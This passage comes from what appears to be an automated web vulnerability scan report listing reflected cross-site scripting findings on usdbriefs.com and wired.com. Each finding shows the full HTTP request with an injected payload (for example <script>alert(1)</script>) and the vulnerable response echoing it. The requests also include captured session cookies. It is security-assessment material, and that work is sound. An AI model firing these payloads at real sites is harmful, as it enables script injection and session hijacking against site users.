<title>Deloitte Dbriefs - Webcast Calendar - Month</title
...[SNIP]...
<a class='main_header'
href='a7f8b'><img src=a onerror=alert(1)>38d2c129f90?v=m'>
...[SNIP]...

1.427. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdbriefs.com
Path:   /calendar/thyme/thyme/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99115"><script>alert(1)</script>ae34abbec08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /calendar/thyme/thyme/index.php/99115"><script>alert(1)</script>ae34abbec08 HTTP/1.1
Host: www.usdbriefs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:35:54 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Set-Cookie: d51493120e269b3e123d4dfe3ef8003e=ddb1b6cdd7e3a89e6dae230ca78f76d5; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 181694

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >

<html>
<head>
<meta http-equiv="Content-type: text/html; charset=UTF-8" />
<title>Deloitte Dbriefs - Webcast Calendar - Month</title
...[SNIP]...
<form method="POST" action="/calendar/thyme/thyme/index.php/99115"><script>alert(1)</script>ae34abbec08" name="cal_event_search" onSubmit='return form_submit_cal_event_search()'>
...[SNIP]...

1.428. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3bf"><a>5de4eb6055f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax9e3bf"><a>5de4eb6055f/widgets/related/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:13:57 GMT
Date: Mon, 22 Nov 2010 01:10:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax9e3bf"><a>5de4eb6055f ss_widgets c_related">
...[SNIP]...

1.429. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b57b"><a>764ea10e8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets1b57b"><a>764ea10e8d2/related/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:29 GMT
Date: Mon, 22 Nov 2010 01:10:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets1b57b"><a>764ea10e8d2 c_related">
...[SNIP]...

1.430. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf640"><a>99098f04c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedbf640"><a>99098f04c4b/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:05 GMT
Date: Mon, 22 Nov 2010 01:11:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedbf640"><a>99098f04c4b">
...[SNIP]...

1.431. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d1"><a>9e67eb28264 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax8f0d1"><a>9e67eb28264/widgets/related/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax8f0d1"><a>9e67eb28264 ss_widgets c_related">
...[SNIP]...

1.432. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f855"><a>144ef7ca22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets4f855"><a>144ef7ca22/related/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets4f855"><a>144ef7ca22 c_related">
...[SNIP]...

1.433. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5558d"><a>877c7a8d468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related5558d"><a>877c7a8d468/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:11 GMT
Date: Mon, 22 Nov 2010 01:11:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related5558d"><a>877c7a8d468">
...[SNIP]...

1.434. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e30b"><a>f706f81ec9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax9e30b"><a>f706f81ec9d/widgets/related/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax9e30b"><a>f706f81ec9d ss_widgets c_related">
...[SNIP]...

1.435. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be84"><a>0968336159a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets4be84"><a>0968336159a/related/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Mon, 22 Nov 2010 01:14:44 GMT
Date: Mon, 22 Nov 2010 01:10:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets4be84"><a>0968336159a c_related">
...[SNIP]...

1.436. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f77cf"><a>7b2d4dc85a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedf77cf"><a>7b2d4dc85a2/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf77cf"><a>7b2d4dc85a2">
...[SNIP]...

1.437. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><a>c45b8c7122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxbbe51"><a>c45b8c7122/widgets/related/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29388
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Mon, 22 Nov 2010 01:14:22 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxbbe51"><a>c45b8c7122 ss_widgets c_related">
...[SNIP]...

1.438. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e2"><a>e80de08ba2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets934e2"><a>e80de08ba2a/related/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29390
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:55 GMT
Date: Mon, 22 Nov 2010 01:10:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets934e2"><a>e80de08ba2a c_related">
...[SNIP]...

1.439. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6a5"><a>1a9008494ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related6c6a5"><a>1a9008494ce/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29390
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:13 GMT
Date: Mon, 22 Nov 2010 01:11:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related6c6a5"><a>1a9008494ce">
...[SNIP]...

1.440. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc70a"><a>3b04f1e36da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxfc70a"><a>3b04f1e36da/widgets/related/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:34 GMT
Date: Mon, 22 Nov 2010 01:10:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxfc70a"><a>3b04f1e36da ss_widgets c_related">
...[SNIP]...

1.441. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d30b"><a>fc5601b0c19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets5d30b"><a>fc5601b0c19/related/content/blogPost/playbook_3021 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:14:53 GMT
Date: Mon, 22 Nov 2010 01:10:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets5d30b"><a>fc5601b0c19 c_related">
...[SNIP]...

1.442. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/playbook_3021

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f817"><a>9b3c8b9b37f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

